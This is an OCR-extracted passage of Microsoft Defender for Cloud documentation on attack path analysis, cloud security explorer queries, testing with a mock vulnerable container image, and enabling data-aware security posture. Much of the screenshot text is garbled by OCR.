to remediate all risks. 


4. Select a node. 


Home > Microsoft Defender for Cloud | Attack paths > 


Internet exposed VM has high severity vulnerabilities and read permission to a Key Vault 
d] 53 © 24:00:00 . 
Paths count Active Recommendations Freshness interval Attack path Recommendations 
Potential impact Below you can find all instances of the attack path in the selected subscriptions 
Attacker with network access to the machine can exploit 
the vulnerabilities, gain remote code execution, and use ^ a biek = ® buda € 
the permission of the identity steal credentials saat EE 
Show more~ 
Description 
Resource types Virtual machine ‘cmdemowin-01' is reachable from the internet, has high severity vulnerabilities allowing remote code execution on the machine and assigned with 


Managed Identity with read permission to Key Vault 'cmdemokeyvault’ 
> Virtual network (1) 


<> Subnet (1) 


E IP Address (1) P S 
E el routes traffic to 


Show more~ 


20.185.32.103 
IP Address 


Category 


sån, 


CREDENTIALS EXPOSURE COMPUTE ABUSE 


routes traffic to routes traffic to can authenticate as 


cmdemowin-01 
Virtual Machine 


E cmdemovnet cmdemosubnet 
Remediation steps Vir etwork Subnet 


1. Go to 'recommendations' tab and resolve all Defender v 


<Previous | Pagef1 wv |of1 | Next> 


5. Select Insight to view the associated insights for that node. 


KA cmdemowin-01 


Virtual Machine 


be E = 
ee 
v 


Info Insights Recommendations 
A has high or critical severity vulnerabilities 


The resource has high or critical severity vulnerabilities that were detected by a 
vulnerability assessment solution 


CVEs list 


Y vulnerable to remote code execution 


w exposed to the internet 


6. Select Recommendations. 


e cmdemowin-01 


Virtual Machine 


v @ 


Info Insights Recommendations 

Name Ty Status Ty 
All network ports should be restricted on network security a Unhealthy 
groups associated to your virtual machine 
Machi hould h | bility findi 

achines should have vulnerability findings ¢ Unhealthy 
resolved 
Management ports should be closed on your virtual 

9 P y e Unhealthy (@ 

machines 


7. Select a recommendation. 
8. Follow the remediation steps to remediate the recommendation. 


9. Select other nodes as necessary and view their insights and recommendations as 
necessary. 


Once an attack path is resolved, it can take up to 24 hours for an attack path to be 
removed from the list. 


View all recommendations with attack path 


Attack path analysis also gives you the ability to see all recommendations by attack path 
without having to check each node individually. You can resolve all recommendations 
without having to view each node individually. 


To resolve all recommendations: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Attack path analysis. 
3. Select an attack path. 


4. Select Recommendations. 


Home > Microsoft Defender for Cloud | Attack paths 


Internet exposed VM has high severity vulnerabilities and read permission to a Key Vault x 
d] « 

Paths count Active Attack path 

Potential impact Remediate the recommendations below to resolve in bulk all attack path instances 
Attacker with network access to the machine can exploit 

ed A e dations T4 Unhealthy resources 
the vulnerabilities, gain remote code execution, and use 
the permission of the identity steal credentials Management ports should be closed on your virtual machines E i oft virtua 
Show more ~ 
Machines should have vulnerability findings resolved E 5 of 1 virtual machines 

Resource types Internet-facing virtual machines sho tected with network sec EZ oof 1 virtual machines 

>. Virtual network (1) All network ports should be restricted on network security groups asso: virtual Oh is 

machine 

<-> Subnet (1) 

E iP Address (1) 
Show more 
Category 

MALS EXPOSURE COMPUTE ABUSE 

Remediation steps Q 
1. Go to ‘recommendations’ tab and resolve all Defender b 


5. Select a recommendation. 
6. Follow the remediation steps to remediate the recommendation. 


Once an attack path is resolved, it can take up to 24 hours for an attack path to be 
removed from the list. 


Consume attack path data programmatically 
using API 


You can consume attack path data programmatically by querying Azure Resource Graph 
(ARG) API. Learn how to query ARG API. 


The following examples show sample ARG queries that you can run: 


Get all attack paths in subscription ‘X’: 


Kusto 


securityresources 


| where type == "microsoft.security/attackpaths" 
| where subscriptionId == <SUBSCRIPTION_ID> 


Get all instances for a specific attack path: For example, ‘Internet exposed VM with high 


severity vulnerabilities and read permission to a Key Vault’. 


Kusto 
securityresources 
| where type == "microsoft.security/attackpaths" 
where subscriptionId == "212f9889-769e-45ae-ab43-6da33674bd26" 


| 
| extend AttackPathDisplayName 
| 


tostring(properties["displayName" ]) 


where AttackPathDisplayName == "<DISPLAY_NAME>" 


API response schema 


The following table lists the data fields returned from the API response: 


Field 
ID 


Name 


Type 


Tenant ID 

Location 

Subscription ID 
Properties.description 
Properties.displayName 
Properties.attackPathType 
Properties. manualRemediationSteps 
Properties.refreshInterval 


Properties. potentiallmpact 


Description 
The Azure resource ID of the attack path instance 
The Unique identifier of the attack path instance 


The Azure resource type, always equals 
“microsoft.security/attackpaths" 


The tenant ID of the attack path instance 
The location of the attack path 

The subscription of the attack path 

The description of the attack path 

The display name of the attack path 

The type of the attack path 

Manual remediation steps of the attack path 
The refresh interval of the attack path 


The potential impact of the attack path being 
breached 


Field Description 


Properties.riskCategories The categories of risk of the attack path 

Properties.entryPointEntityInternallD The internal ID of the entry point entity of the attack 
path 

Properties.targetEntityInternallD The internal ID of the target entity of the attack path 

Properties.assessments Mapping of entity internal ID to the security 


assessments on that entity 
Properties.graphComponent List of graph components representing the attack path 


Properties.graphComponent.insights List of insights graph components related to the 
attack path 


Properties.graphComponent.entities List of entities graph components related to the attack 
path 


Properties.graphComponent.connections List of connections graph components related to the 
attack path 


Properties.AttackPathID The unique identifier of the attack path instance 


External attack surface management (EASM) 


An external attack surface is the entire area of an organization or system that is 
susceptible to an attack from an external source. An organization's attack surface is 
made up of all the points of access that an unauthorized person could use to enter their 
system. The larger your attack surface is, the harder it's to protect. 


While you're investigating and remediating an attack path, you can also view your EASM 
if it's available, and if you've enabled Defender EASM to your subscription. 
© Note 


To manage your EASM, you must deploy the Defender EASM Azure resource to 
your subscription. Defender EASM has its own cost and is separate from Defender 
for Cloud. To learn more about Defender for EASM pricing options, you can check 
out the pricing page”. 


To manage your EASM: 


1. Sign in to the Azure portal £. 


2. Navigate to Microsoft Defender for Cloud > Attack path analysis. 


3. Select an attack path. 
4. Select a resource. 
5. Select Insights. 


6. Select Open EASM. 


P Search resources, services and docs 


= Microsoft Azure 


elender for Cloud 


Internet exposed VM with critical vulnerabilities has high privileged permissions to a subscription 2 ~ 


mendations 


Below you can find all instances of the attack path in the selected subscriptions 
Showing 1-8 of 8 items 
Name TY 


$ ADFSHIR —> — F Contosode 


inning and reachable from the 
ntity permission 


V E A'joseph-ludwig o Ë CAVOMS-Ubuntu20.04 


mo-db (cxedemo-sql/cxedemo-db) 


be Ë ContosoDe 


—> Ë PurviewNinjaSQL (ninjasql/PurviewNinjasQu) 
Target 


7. Follow the Using and managing discovery instructions. 


Next Steps 


Learn how to build queries with cloud security explorer. 


aged identity assigned to it with contributor permissions on a subscription. Attacker with network access to the VM can 


E 
Insights Recommendations 
exposed to the internet 
GG Defender EASM findings | © At the last2 dsys 


Build queries with cloud security 
explorer 
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Defender for Cloud's contextual security capabilities assists security teams in reducing 
the risk of impactful breaches. Defender for Cloud uses environmental context to 
perform a risk assessment of your security issues, identifies the biggest security risks, 
and distinguishes them from less risky issues. 


Use the cloud security explorer, to proactively identify security risks in your cloud 
environment by running graph-based queries on the cloud security graph, which is 
Defender for Cloud's context engine. You can prioritize your security team's concerns, 
while taking your organization's specific context and conventions into account. 


With the cloud security explorer, you can query all of your security issues and 
environment context such as assets inventory, exposure to internet, permissions, and 


lateral movement between resources and across multiple clouds (Azure AWS, and GCP). 


Learn more about the cloud security graph, attack path analysis, and the cloud security 


explorer. 


Availability 


Aspect Details 
Release state GA (General Availability) 
Required plans - Defender Cloud Security Posture Management (CSPM) enabled 


- Defender for Servers P2 customers can use the explorer UI to query for 
keys and secrets, but must have Defender CSPM enabled to get the full 
value of the Explorer. 


Required roles and - Security Reader 
permissions: - Security Admin 
- Reader 


- Contributor 
- Owner 


Clouds: © Commercial clouds (Azure, AWS) 
* Commercial clouds (GCP) 
* National (Azure Government, Microsoft Azure operated by 21Vianet) 


Prerequisites 


e You must enable Defender CSPM. 
o For agentless container posture, you must enable the following extensions: 
o Agentless discovery for Kubernetes (preview) 
o Container registries vulnerability assessments (preview) 


e You must enable agentless scanning. 


e Required roles and permissions: 
o Security Reader 
o Security Admin 
o Reader 
o Contributor 
o Owner 


Check the cloud availability tables to see which government and cloud environments are 
supported. 


Build a query with the cloud security explorer 


The cloud security explorer allows you to build queries that can proactively hunt for 
security risks in your environments with dynamic and efficient features such as: 


e Multi-cloud and multi-resource queries - The entity selection control filters are 
grouped and combined into logical control categories to assist you in building 
queries across cloud environments and across resources simultaneously. 


e Custom Search - Use the dropdown menus to apply filters to build your query. 


e Query templates - Use any of the available prebuilt query templates to more 
efficiently build your query. 


e Share query link - Copy and share a link of your query with other people. 
To build a query: 
1. Sign in to the Azure portal £. 


2. Navigate to Microsoft Defender for Cloud > Cloud Security Explorer. 


soft Defender for Cloud 


D search Sport L Download CSV report (Previev 
General 
O pere SA 


© enira tated 
recommendations 

E peur alerts 

e era 

fF coud cy reei 

E Workbooks 

© community 

cing ae prt 
peren 

© Sect posture Scope! sete 
E Regulatory compliance 
Worn protections Query templates 
% real Manager 


P EP intenet exposed VMs 
pradera exposed 
Management virtual machines 


I environment senings 
E security solutions Open query > 


5% Workflow automation 


User accounte with permission to 
vulnerable VMs 
onan al ser acount ith 
permission to Vs thst have Wich 
Severity wineabiies 


Open query > 
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EP Guides & Feedback 
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Servers vith managed identiy Fetus all user accounts that do not 
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Open query 
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that has permissions to storage 
‘account 


vulnarable pods 
etume all the kubemetes namespaces 
with a kubernetes service routing tfc 
to pod with high severity 

re 


Retuma all VMs which are vulnerabie to 
ere vulnerability and have an 


identity artached with permissions to a epean 
storage account 

bd pen query > 
‘open query > 


3. Search for and select a resource from the drop-down menu. 


Microsoft Azure (Preview) Æ Search resources, services, 


Home > Microsoft Defender for Cloud 


m@ Microsoft Defender for Cloud | Cloud Security Explorer 


D overview 

Getting started 
Recommendations 
Security alerts 
Inventory 


Cloud Security Explorer 


BA © e 


Workbooks 
GO Community 


@ Diagnose and solve problems 
Cloud Security 

Ọ Security posture 

E Regulatory compliance 

Ọ workload protections 

E Firewall Manager 

1] DevOps Security (Preview) 
Management 

ili Environment settings 

E security solutions 


% Workflow automation 


@ Share query link 


V report (Preview) 


ZO Guides & Feedback 


$B Aur Kitemetes piena ©, Key Vautt keys and secrets 
images ith high severity without any expiration period 
EEE 


Return all Azure key vaus where 
Returns all kubernetes pods running expiration is not set for secrets or 
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Open query > 
Open query > 
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sensitive data that are exposed tothe 
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‘open query > 


o Some of your subscriptions are missing the advantage of data sensitivity discovery. To automatically enable the Sensitive Data Discovery component in your Defender 


AN 


a 


What would you like to search? 


Select resource types 


| YY? Popular 
a Compute 
B Networking 
D pata 
Scope : 17 sele $È Containers 


bd Keys & Secrets 


©) APIs 


a 


Query ter i 
© DevOps 


E 


Identity & Access 


vil Clear all 


Open query > 


& User accounts with permission to 
vulnerable VMs 


hd, dd, d, da, dd, A 


4. Select + to add other filters to your query. 


Select all 


Virtual machines 


Kubernetes clusters 


Managed databases (PaaS) 


Hosted databases (laaS) 


Object storage 


User accounts 


Azure Service Fabric clusters 


Container Images 


EEE iat 


vulnerabilities 


Open query > 


Internet exposed SQL Servers 
tagged as production 


E, 


Hover on an item to 
show more info 


able to a specific 
d 


| Done | iternet exposed virtual 


= ~Inerable to Log4Shell 
vulnerabilities 


Open query > 


External users with pei n to 
SQL VMs allow code execution on 


a 


yv ay What would you like to search? 


— | EC2 Instances, Virtual machines v WW) Clear all Ea 


br That [ Exposed to the internet B x Remove 
(AND v) 

berr That [_vuinerabilties B Where [ severity M Equals v [ Hion V | x Remove 
(AND) 


br That [ Can be accessed by v | T I Managed identities v ] x Remove 


5. Add subfilters as needed. 


6. After building your query, select Search to run the query. 


v Ñ; What would you like to search? 


[ Virtual machines (group) v | 


That [Has vulnerabilities {v Where Equals w I High, Medium ADA x Remove 


AND v) 


That | Exposed to the internet v x Remove 


Scope : 17 selected 


Results (9) 


l O Search item 


Resource name Insights CVE-ID 

E cmdemowin-01 Exposed to the internet CVE-2023-28255 CVE-2023-28308 á e Sa b 
E kgs-worker Exposed to the internet CVE-2020-14145 CVE-2021-25741 y ; 
E kuha-wnrkar-1 Evnacad tn tha intarnat CVE-9N22-NAIQ_ FVE-7N?77-N77Q A 


If you want to save a copy of your results locally, you can select the Download CSV 
report button to save a copy of your search results as a CSV file. 


Home > Microsoft Defender for Cloud 


e Microsoft Defender for Cloud | Cloud Security Explorer 


| 2 Search | EZ Share query link d Download CSV report (Preview) Gel Guides & Feedback 
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Ọ overview 


@ Getting started 
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Security alerts 


Inventory 


Cloud Security Explorer | Virtual machines (group) ba | 
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AA 
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Diagnose and solve problems 


Query templates 


Query templates are preformatted searches using commonly used filters. Use one of the 
existing query templates from the bottom of the page by selecting Open query. 


Home > Microsoft Defender for Cloud 


m@ Microsoft Defender for Cloud | Cloud Security Explorer 
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@ Diagnose and solve problems Learn more 


Cloud Security 
© Security posture Scope : 17 selected © earch 


E Regulatory compliance 


Ọ workload protections Query templates 


E Firewall Manager 
EZ Internet exposed VMs EZ Internet exposed VMs with high EZ 


E DevOps Security (Preview) severity vulnerabilities 


Returns all internet exposed 
virtual machines Returns all internet exposed virtual 

machines that have high severity 
I Environment settings vulnerabilities 


e Open query > | Q 
E Security solutions Open query > | | 


Ta Workflow automation 


Management 


You can modify any template to search for specific results by changing the query and 
selecting Search. 


Share a query 


Use the query link to share a query with other people. After creating a query, select 
Share query link. The link is copied to your clipboard. 


Home > Microsoft Defender for Cloud 


m@ Microsoft Defender for Cloud | Cloud Security Explorer 
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@ Diagnose and solve problems 


Cloud Security 


Scope : 17 selected Search 
© Security posture E EZE 


Ọ Regulatory compliance 
o= 

Q workload protections = Results (9) 

™ Firewall Manager | Ø Search item Q 


E DevOps Security (Preview) 
Resource name Insights CVE-ID 


Next steps 


View the reference list of attack paths and cloud security graph components. 


Learn about the Defender CSPM plan options. 


Testing the Attack Path and Security 
Explorer using a vulnerable container 
image 
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Observing potential threats in the attack path 
experience 


Attack path analysis is a graph-based algorithm that scans the cloud security graph. The 
scans expose exploitable paths that attackers may use to breach your environment to 
reach your high-impact assets. Attack path analysis exposes attack paths and suggests 
recommendations as to how best remediate issues that will break the attack path and 
prevent successful breach. 


Explore and investigate attack paths by sorting them based on name, environment, path 
count, and risk categories. Explore cloud security graph Insights on the resource. 
Examples of Insight types are: 


e Pod exposed to the internet 
e Privileged container 
e Pod uses host network 


e Container image is vulnerable to remote code execution 


Testing the attack path and security explorer 
using a mock vulnerable container image 


If there are no entries in the list of attack paths, you can still test this feature by using a 
mock container image. Use the following steps to set up the test: 


Requirement: An instance of Azure Container Registry (ACR) in the tested scope. 
1. Import a mock vulnerable image to your Azure Container Registry: 


a. Run the following command in Cloud Shell: 


az acr import --name $MYACR --source DCSPMtesting.azurecr.io/mdc- 


mock-@@01 --image mdc-mock-@001 


b. If your AKS isn't attached to your ACR, use the following Cloud Shell command 
line to point your AKS instance to pull images from the selected ACR: 


az aks update -n myAKSCluster -g myResourceGroup --attach-acr <acr- 


name> 


2. Authenticate your Cloud Shell session to work with the cluster: 


az aks get-credentials --subscription <cluster-suid> --resource-group 
<your-rg> --name <your-cluster-name> 


3. Verify success by doing the following steps: 


e Look for an entry with mdc-dcspm-demo as namespace 

e Inthe Workloads-> Deployments tab, verify “pod” created 3/3 and 
dcspmcharts-ingress-nginx-controller 1/1. 

e In services and ingresses look for-> services service, dcspmcharts-ingress- 
nginx-controller and dcspmcharts-ingress-nginx-controller-admission. In 
the ingress tab, verify one ingress is created with an IP address and nginx 


class. 


4. Deploy the mock vulnerable image to expose the vulnerable container to the 


internet by running the following command: 


helm install dcspmcharts oci://dcspmtesting.azurecr.io/dcspmcharts --version 
1.0.0 --namespace mdc-dcspm-demo --create-namespace --set registry=<your- 


registry> 


© Note 


After completing the above flow, it can take up to 24 hours to see results in the 


cloud security explorer and attack path. 


Investigate internet exposed Kubernetes pods 


You can build queries in one of the following ways: 


e Find the security issue under attack paths 


e Explore risks with built-in cloud security explorer templates 
e Create custom queries with cloud security explorer 


Find the security issue under attack paths 
1.Go to Recommendations in the Defender for Cloud menu. 


1. Select the Attack Path link to open the attack paths view. 


Home > Microsoft Defender for Cloud 


y= Microsoft Defender for Cloud | Recommendations 


Showing 18 subscriptions 


[2 Search | 


© Refresh 4 Download CSV report “W Open query EI Governance report A? Guides & Feedback 


> 
tatus == None X Severity == None X Resource type == None X b Add filter 
Maxscore A Current score TA Potential score increase Ty Status Ty 
@ Diagnose and solve problems > enable MFA 10 780 PUOUR008 + 2% Unassigned 
Cloud Security > secure management ports 8 768 BERRERI +o% Unassigned 
© Security posture > Remediate vulnerabilities GU +3% © overdue 
@ Regulatory comoliance > Apply system updates 293 900 + 2% Overdue 


35 of 118 resources 


Show my items only: SO Off 


-a 
= | 


2. Locate the entry that details this security issue under "Internet exposed Kubernetes 


pod is running a container with high severity vulnerabilities.” 


Home 


Microsoft Defender for Cloud | Attack paths 


ZI Leam more A? Guides & Feedback 


© 112 61 Attack path by category 
% rra 
Total attack paths Affected resources Ic a, ee Dð 
Internet exposed Kubernetes pod is running a. Attack paths == All Risk cat All R types == All 
Attack path ty aths count 


Risk categories 
© internet exposed Kubemetes pod is running a container with high severity vulneral 


Explore risks with cloud security explorer templates 


1. From the Defender for Cloud overview page, open the cloud security explorer. 


2. Some out of the box templates for Kubernetes appear. Select one of the templates: 


e Azure Kubernetes pods running images with high severity vulnerabilities 


e Kubernetes namespaces contain vulnerable pods 


Home > Microsoft Defender for Cloud 


m=. Microsoft Defender for Cloud | Cloud Security Explorer 


Showing 18 subscriptions 


& Search @ Share query link 1 
General 
© overview 


Getting started 


Recommendations 
© Attack path analysis 
© security alerts 


@ Inventory 


E Cloud Security Explorer 


@ Workbooks 
e Community 
@ Diagnose and solve problems 
Cloud Security 
Security posture 
Regulatory compliance 


Firewall Manager 


9 
9 
D workload protections 
e 
E 


DevOps security (preview) 


Management 


I Environment settings 


3. Select Open query; the template builds the query in the upper portion of the 


E 


Internet exposed VMs 


Returns all internet exposed 
virtual machines 


Open query > 


User accounts without MFA and 
with permissions to Storage 
Accounts 

Returns all user accounts that do not 
have MFA enabled, and have 
permissions on a storage account 


Open query > 


Internet exposed SQL Servers 
tagged as production 


Returns all SQL Servers which tagged 
as production and exposed to the 
internet 


Open query > 


AP Guides & Feedback 


a 


Internet exposed VMs with high 
severity vulnerabilities 


Returns all internet exposed virtual 
machines that have high severity 
vulnerabilities 


Open query > 


Azure Kubernetes pods running 
images with high severity 
vulnerabilities 


Returns all kubernetes pods running 


an image with vulnerability severity 
high or above 


Open query > 


External users with permission to 
SQL VMs allow code execution on 
the host 


Returns all the users with permissions 


to a SQL VM that can run scripts on 
the host 


‘Open query > 


screen. Select Search to view the results. 


Home > Microsoft Defender for Cloud 


Microsoft Defender for Cloud | Cloud Security Explorer 


Showing 18 subscriptions 
[ D Search « 
General 

© overview 

@ Getting started 

E Recommendations 

© Attack path analysis 
@ Security alerts 
m Inventory 
Cloud Security Explorer | 


@ Workbooks 


è 


Community 


@ Diagnose and solve problems 


Cloud Security 
© Security posture o 
Regulatory compliance 


Workload protections 


Firewall Manager 


edoa 


DevOps security (preview) 
e Scope : All 


© Share query link 


Down! 


Pods 


Guides & Feedback 


What would you like to search? 


JB 


VMs vulnerable to a specific 
vulnerability 


Returns all internet exposed virtual 


machines vulnerable to LogáShell 
vulnerabilities 


Open query > 


Key Vault keys and secrets 
without any expiration period 
Retums all Azure key vaults where 


expiration is not set for secrets or 
keys 


Open query > 


VMs with Log4Shell vulnerability 
that has permissions to storage 
account 


Returns all VMs which are vulnerable to 
Log4Shell vulnerability and have an 
identity attached with permissions to a 
storage account 


Open query > 


© New simplified billing and reduced price for Defender CSPM at $5/billable resource/month. Free until August 1, 2023. Learn more here> 


That [1s running 


x] 


[containers 


Internet exposed SQL servers with 
managed identity 


Returns all intemet exposed SQL 
servers with managed identity 
assigned 


Open query > 


User accounts with permission to 
vulnerable VMs 


Returns all user accounts with 
permission to VMs that have high 
severity vulnerabilities 


Open query > 


Kubemetes namespaces contain 
vulnerable pods 


Returns all the kubernetes namespaces 
with a kuberetes service routing traffic 
to a pod with high severity 
vulnerabilities 


Open query > 


E Clear all 


L That [Is rumning 


v] + 


Create custom queries with cloud security explorer 


Templates 


x 
a 
< 
a 
Whe 
> 
v 


You can also create your own custom queries. The following example shows a search for 


pods running container images that are vulnerable to remote code execution. 


Home > Microsoft Defender for Cloud 


F Microsoft Defender for Cloud | Cloud Security Explorer 


Showing 18 subscriptions 


[2 Search J « @ Share query link 
General A 
D Overview v 


p 


@ Getting started 
ZZ Recommendations 


Attack path analysis 


Security alerts 


© 
o 
@ Inventory 
e Cloud Security Explorer 
Si Workbooks 
GO Community 


@ Diagnose and solve problems 


Cloud Security b 
© Security posture 

E Regulatory compliance 

D Workload protections 


E Firewall Manager Scope : All 


report 


Ae Guides & Feedback 


What would you like to search? 


Is running v] 


lere 


L That | Is running 


L That [| Vulnerable to remote co.. v| + 


| container images 


builde 


Ñ] Clear all 


can + | 


E Templates 


a 


The results are listed below the query. 


EZ Results (3) 


Ø Search item 


Resource na... Connecti... Resource... Connecti... Resource... Connecti... 
PS mdc-despn Contains & service Routes traffic EE pod-688 = Is running 
ES mdc-despn Contains & service Routes traffic EE pod-688 Is running 
PS mdc-despn Contains d service Routes traffic EE pod-688 = Is running 


Next steps 


Resource ... 


B hello-co 


B® hello-co 


B hello-co 


Connecti... 


Is running 


Is running 


Is running 


e Learn more about the Defender for Cloud Defender plans. 


Resource ... 


E despmac 
EZ despmac 


E despmac 


CVE-ID 


CVE-2019-18: 


CVE-2019-18. 


CVE-201 


Enable data-aware security posture 
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This article describes how to enable data-aware security posture in Microsoft Defender 
for Cloud. 


Before you start 


Before you enable data-aware security posture, review support and prerequisites. 
When you enable Defender CSPM or Defender for Storage plans, the sensitive data 
discovery extension is automatically enabled. You can disable this setting if you 
don't want to use data-aware security posture, but we recommend that you use 
the feature to get the most value from Defender for Cloud. 

Sensitive data is identified based on the data sensitivity settings in Defender for 
Cloud. You can customize the data sensitivity settings to identify the data that your 
organization considers sensitive. 

It takes up to 24 hours to see the results of a first discovery after enabling the 
feature. 


Enable in Defender CSPM (Azure) 


Follow these steps to enable data-aware security posture. Don't forget to review 


required permissions before you start. 


d 


2. 


d 


Navigate to Microsoft Defender for Cloud > Environmental settings. 
Select the relevant Azure subscription. 
For the Defender CSPM plan, select the On status. 


If Defender CSPM is already on, select Settings in the Monitoring coverage column 
of the Defender CSPM plan and make sure that the Sensitive data discovery 
component is set to On status. 


. Once sensitive data discovery is turned On in Defender CSPM, it will automatically 


incorporate support for additional resource types as the range of supported 
resource types expands. 


Enable in Defender CSPM (AWS) 


Before you start 


e Don't forget to: review the requirements for AWS discovery, and required 
permissions. 

e Check that there's no policy that blocks the connection to your Amazon S3 
buckets. 

e For RDS instances: cross-account KMS encryption is supported, but additional 
policies on KMS access may prevent access. 


Enable for AWS resources 


S3 buckets and RDS instances 


1. Enable data security posture as described above 
2. Proceed with the instructions to download the CloudFormation template and to 
run it in AWS. 


Automatic discovery of S3 buckets in the AWS account starts automatically. 


For S3 buckets, the Defender for Cloud scanner runs in your AWS account and connects 
to your S3 buckets. 


For RDS instances, discovery will be triggered once Sensitive Data Discovery is turned 
on. The scanner will take the latest automated snapshot for an instance, create a manual 
snapshot within the source account, and copy it to an isolated Microsoft-owned 
environment within the same region. 


The snapshot is used to create a live instance that is spun up, scanned and then 
immediately destroyed (together with the copied snapshot). 


Only scan findings are reported by the scanning platform. 


Isolated Regional MDC Scanning l Defender for Cloud Portal 


Environment (AWS) 


Ez: "= | \ 


AWS Customer Account 


Scanning Platform 


> < 


Manual 


C Snapshot Copy E 


Automatic Manual 
Snapshots Snapshots 


AS 


Check for S3 blocking policies 
If the enable process didn't work because of a blocked policy, check the following: 


e Make sure that the S3 bucket policy doesn't block the connection. In the AWS S3 
bucket, select the Permissions tab > Bucket policy. Check the policy details to 
make sure the Microsoft Defender for Cloud scanner service running in the 
Microsoft account in AWS isn't blocked. 

e Make sure that there's no SCP policy that blocks the connection to the S3 bucket. 
For example, your SCP policy might block read API calls to the AWS Region where 
your S3 bucket is hosted. 

e Check that these required API calls are allowed by your SCP policy: AssumeRole, 
GetBucketLocation, GetObject, ListBucket, GetBucketPublicAccessBlock 

e Check that your SCP policy allows calls to the us-east-1 AWS Region, which is the 
default region for API calls. 


Enable data-aware monitoring in Defender for 
Storage 


Sensitive data threat detection is enabled by default when the sensitive data discovery 


component is enabled in the Defender for Storage plan. Learn more. 


Only Azure Storage resources will be scanned if the Defender CSPM plan is turned off. 


Next steps 


Review the security risks in your data 


Explore risks to sensitive data 
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After you discover resources with sensitive data, Microsoft Defender for Cloud lets you 


explore sensitive data risk for those resources with these features: 


e Attack paths: When sensitive data discovery is enabled in the Defender Cloud 
Security Posture Management (CSPM) plan, you can use attack paths to discover 
risk of data breaches. Learn more. 

e Security Explorer: When sensitive data discovery is enabled in the Defender CSPM 
plan, you can use Cloud Security Explorer to find sensitive data insights. Learn 
more. 

e Security alerts: When sensitive data discovery is enabled in the Defender for 
Storage plan, you can prioritize and explore ongoing threats to sensitive data 
stores by applying sensitivity filters Security Alerts settings. 


Explore risks through attack paths 


View predefined attack paths to discover data breach risks, and get remediation 


recommendations, as follows: 


1. In Defender for Cloud, open Recommendations > Attack paths. 


2. In Risk category filter, select Data exposure or Sensitive data exposure to filter 
the data-related attack paths. 


Home > Microsoft Defender for Cloud | Recommendations 


Microsoft Defender for Cloud | Attack paths 


Showing 1 subscriptions. 


ZI Learn more Guides & Feedback 


Attack path by category 


© 224 e122 SD 


Total attack paths 


Affected resources Active recommendations 


Attack path name Attack paths == All Risk categories == All Resource types == All Reset filters 


Attack path Ty Risk categories Paths count Ty Risk categories 


Il Credential exposure (172) fl Compute abuse (38) Il Sensitive data exposure (10) Other (18) 


Risk categories © 

@ RDS snapshot is publicly available to all AWS accounts (Preview) All Vv 2 Data exposure 

© Private AWS S3 bucket replicates data to internet exposed and publicly a All 1 Data exposure 

© Managed database with excessive internet exposure allows basic (local u Compute abuse 2 Data exposure 

© Internet exposed VM has high severity vulnerabilities and read permission tc Credential exposure $ Credentials exposure, Comy 
© Internet exposed VM has high severity vulnerabilities and read permission te Credentials exposure 2 Sensitive data exposure, Co 
© Internet exposed VM has high severity vulnerabilities and read permission f Data exposure | 2 Data exposure, Compute at 
© Internet exposed VM has high severity vulnerabilities Lateral movement 10 Compute abuse 

© Internet exposed SQL on VM has a user account with commonly used usernf Sensitive data exposure] 1 Compute abuse, Lateral mo 
© Internet exposed SQL on VM has a user account with commonly used userni Subscription/account takeover 1 Data exposure, Lateral mov 
© Internet exposed Kubernetes pod is running a container with high severity vulnerabilities (Preview) Azure 6 Compute abuse 


3. Review the data attack paths. 


4. To view sensitive information detected in data resources, select the resource name 
> Insights. Then, expand the Contain sensitive data insight. 


5. For risk mitigation steps, open Active Recommendations. 
Other examples of attack paths for sensitive data include: 


e "Internet exposed Azure Storage container with sensitive data is publicly 
accessible" 

e "Managed database with excessive internet exposure and sensitive data allows 
basic (local user/password) authentication" 

e "VM has high severity vulnerabilities and read permission to a data store with 
sensitive data" 

e "Internet exposed AWS S3 Bucket with sensitive data is publicly accessible" 

e "Private AWS S3 bucket that replicates data to the internet is exposed and publicly 
accessible" 

e "RDS snapshot is publicly available to all AWS accounts" 


Review a full list of attack paths. 


Explore risks with Cloud Security Explorer 


Explore data risks and exposure in cloud security graph insights using a query template, 
or by defining a manual query. 


1. In Defender for Cloud, open Cloud Security Explorer. 


2. You can build your own query, or select one of the sensitive data query templates 
> Open query, and modify it as needed. Here's an example: 


Home > Microsoft Defender for Cloud 


Microsoft Defender for Cloud | Cloud Security Explorer 


Showing subscription ‘CyberSecSOC’ 


| Ø Search | < & Guides & Feedback > Share query link 

General 

© Overview & O a 
{v es » What would you like to search? 

@ Getting started 


Recommendations 


Security alerts 


Object storage (group) 
Inventory : ai at x] 


o That | Contains sensitive data Vv | x Remove 


‘nin 


OO Community 


UA 
5 
E Cloud Security Explorer 
G 


That [ Allows public access Vv | + x Remove 


ZO Diagnose and solve problems 


Cloud Security 


E Security posture Scope : All 


Use query templates 


As an alternative to creating your own query, you can use predefined query templates. A 
number of sensitive data query templates are available. For example: 


e Internet exposed storage containers with sensitive data that allow public access. 
e Internet exposed S3 buckets with sensitive data that allow public access 


When you open a predefined query it's populated automatically and can be tweaked as 
needed. For example, here are the prepopulated fields for "Internet exposed storage 
containers with sensitive data that allow public access”. 


Home > Microsoft Defender for Cloud 


Microsoft Defender for Cloud | Cloud Security Explorer 
Showing subscription ‘CyberSecSOC’ 


[© Search E &® Guides & Feedback @> Share query link 
General = 
Overvi £ 
O Overview v ZA What would you like to search? 
@ Getting started 
y= Recommendations 


@ Security alerts 


@ Inventory —_{ Azure Blob storage containers ba | 

E ous Seay Explores That [ Contains sensitive data v | x Remove 

@ Workbooks CO 

2 Sony —— That [ Allows public access Vv | + x Remove 

@ Diagnose and solve problems (ano) 

Cloud Security bea That [ Contained in ba | + | Object storage (group) v | 


© Security posture E 
@ Regulatory compliance That [Exposed to the internet v | x Remove 
Ọ Workload protections 


E, Firewall Manager 


E DevOps Security (Preview) Scope : All 


Explore sensitive data security alerts 


When sensitive data discovery is enabled in the Defender for Storage plan, you can 
prioritize and focus on alerts the alerts that affect resources with sensitive data. Learn 
more about monitoring data security alerts in Defender for Storage. 


For PaaS databases and S3 Buckets, findings are reported to Azure Resource Graph 
(ARG) allowing you to filter and sort by sensitivity labels and sensitive info types in 
Defender for Cloud Inventory, Alert and Recommendation blades. 


Export findings 


It's common for the security administrator, who reviews sensitive data findings in attack 
paths or the security explorer, to lack direct access to the data stores. Therefore, they'll 
need to share the findings with the data owners, who can then conduct further 
investigation. 


For that purpose, use the Export within the Contains sensitive data insight. 


SQL server 


soul ContosoSQLSrv 


V General details 


Subscription Resource group 
ContosoSec ContosoRG 


Cloud provider 
© azure 


Insights - Contains sensitive data (Preview) 


Last scan time (UTC) 
